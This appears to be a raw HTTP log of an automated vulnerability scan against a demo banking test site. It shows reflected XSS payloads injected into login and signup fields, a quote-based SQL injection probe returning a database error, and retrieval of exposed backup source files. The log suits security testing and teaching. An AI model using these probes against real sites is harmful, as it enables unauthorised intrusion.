if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/link14/index.htm HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:25 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:12 GMT
ETag: "24dd20ffa9dc11:8f6"
Content-Length: 39
<A HREF="./link15/index.htm">Link15</A>GET /_vti_pvt/document.URL; HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_pvt/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /join.asp?name=1"style="background:url(javascript:alert('XSS'))"%20"&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:24 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /linking/index.htm HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:18 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:08 GMT
ETag: "a0aba6fca9dc11:8f6"
Content-Length: 37
<A HREF="./link1/index.htm">Link1</A>POST /login1.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 71
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
login='&password=333%2D333%2D3333test@test999.com&graphicOption=minimumHTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:30 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 358
Content-Type: text/html
Cache-control: private
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'user = ''''.</font>
<p>
<font face="Arial" size=2>/login1.asp</font><font face="Arial" size=2>, line 10</font> GET /rootlogin.asp.old HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:35:03 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:20 GMT
ETag: "5cb724c2a8dc11:8f6"
Content-Length: 1351
<%
dim sName, sPassPhrase
sName=Request("txtName")
sPassPhrase=Request("txtPassPhrase")
%>
<html>
<body>
<%
if lcase(sName)="root" then
Response.Write "Hello " & sName & "<br>Welcome back"
elseif lcase(sName)="/etc/passwd" then
Response.Write "root:x:0:0::/root:/bin/sh"
Response.Write "dsmith:x:516:522::/home/dsmith:/bin/false"
Response.Write "etaylor:x:517:523::/home/etaylor:/bin/false"
Response.Write "scooby:x:518:524::/home/scooby-doo:/bin/false"
Response.Write "pshaggy:x:519:526::/home/pshaggy:/bin/false"
Response.Write "dtomson:x:520:527::/home/dtomson:/bin/false"
Response.Write "jsmith:x:521:528::/home/jsmith:/bin/false"
elseif lcase(sName)="/boot.ini" then
Response.Write "[boot loader]"
Response.Write "timeout=30"
Response.Write "default=multi(0)disk(0)rdisk(0)partition(3)\WINNT"
Response.Write "[operating systems]"
Response.Write "multi(0)disk(0)rdisk(0)partition(3)\WINNT=""Microsoft Windows 2000 Server"" /fastdetect"
Response.Write "multi(0)disk(0)rdisk(0)partition(2)\WINNT=""Microsoft Windows 2000 Professional"" /fastdetect"
elseif lcase(sName)="*" then
Response.Write "An error has occured"
elseif lcase(sName)=";" then
Response.Write "NON-HTML ERROR"
else
Response.Write "Go away " & sName & "<br>I don't know you"
end if
%>
</body>
</html>
GET /default.asp.bak HTTP/1.0
Referer: http://zero.webappsecurity.com:80/error.html
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:35:38 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 05:45:35 GMT
ETag: "481b288badc11:8f6"
Content-Length: 37
<%
response.redirect "login.asp"
%>GET /_private/.FBCIndex HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:50:23 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /login/login.asp?Action=Login&UserName=1"style="background:url(javascript:alert('XSS'))"%20"&Password=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:53:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 374
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<h1>Invalid username: 1"style="background:url(javascript:alert('XSS'))" "</h1>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
GET /_vti_bin/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 401 Access Denied
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:33 GMT
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
Content-Length: 4431
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>You are not authorized to view this page</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->You are not authorized to view this page</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">You do not have permission to view this directory or page using the credentials you supplied.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Click the <a href="javascript:location.reload()">Refresh</a> button to try again with different credentials.</li>
<li>If you believe you should be able to view this directory or page, please contact the Web site administrator by using the e-mail address or phone number listed on the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page.</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 401.2 - Unauthorized: Logon failed due to server configuration<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Background:<br>
This is usually caused by a server-side script not sending the proper WWW-Authenticate header field. Using Active Server Pages scripting this is done by using the <strong>AddHeader</strong> method of the <strong>Response</strong> object to request that the client use a certain authentication method to access the resource.
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=401.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li>
</p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
HEAD / HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Content-Type: text/plain
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 17:03:39 GMT
X-Powered-By: ASP.NET
Location: banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Keep-Alive
Content-Length: 0
Content-Type: text/html
Cache-control: private
Set-Cookie: ASPSESSIONIDCQADCBSB=IPAAPGKBNLDFANIMOAOOHNCB; path=/
GET /login/login.asp?Action=Login&UserName=>"><script>alert('XSS')</script>&Password=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:53:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 355
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<h1>Invalid username: >"><script>alert('XSS')</script></h1>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
GET /join.asp?name=&email=1"style="background:url(javascript:alert('XSS'))"%20"&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:24 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
